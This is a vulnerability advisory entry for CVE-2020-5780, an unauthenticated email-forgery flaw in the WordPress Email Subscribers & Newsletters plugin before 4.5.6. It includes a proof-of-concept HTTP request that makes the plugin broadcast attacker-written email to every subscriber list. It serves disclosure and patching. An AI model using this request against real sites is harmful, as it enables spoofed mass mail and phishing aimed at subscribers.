Email Subscribers & Newsletters < 4.5.6 – Unauthenticated email forgery/spoofing | CVE 2020-5780 | Plugin Vulnerabilities

Description

It allows a remote unauthenticated attacker to send forged emails to all recipients from the available lists of contacts or subscribers, with complete control over the content and subject of the email.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 222

action=admin_init&broadcast_data[id]=999&ig_es_broadcast_submitted=submitted&broadcast_data[subject]=test999&broadcast_data[body]=body-content&broadcast_data[list_ids]=2&broadcast_data[meta][scheduling_option]=schedule_now

Affects Plugins

email-subscribers

Fixed in 4.5.6

References

CVE

URL

https://www.tenable.com/security/research/tra-2020-53

URL

https://portswigger.net/daily-swig/vulnerability-in-wordpress-email-marketing-plugin-patched

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Alex Peña

Verified

No

WPVDB ID

cf3f71c2-6de2-4c8c-b7c4-29a63971777d

Timeline

Publicly Published

2020-09-10 (about 5 years ago)

Added

2020-09-10 (about 5 years ago)

Last Updated

2020-09-15 (about 5 years ago)

Other

Published

Title

Published

2022-08-01

Title

Duplicator < 1.4.7 - Unauthenticated Backup Download

Published

2019-08-09

Title

Woody Ad Snippets < 2.2.6 - Arbitrary Post Deletion

Published

2021-09-06

Title

WordPress Automatic < 3.53.3 - Unauthenticated Arbitrary Options Update

Published

2021-09-30

Title

JS Job Manager < 1.1.9 - Unauthenticated Arbitrary Plugin Installation/Activation

Published

2023-08-14

Title

Advanced File Manager < 5.1.1 - Admin+ Arbitrary File/Folder Access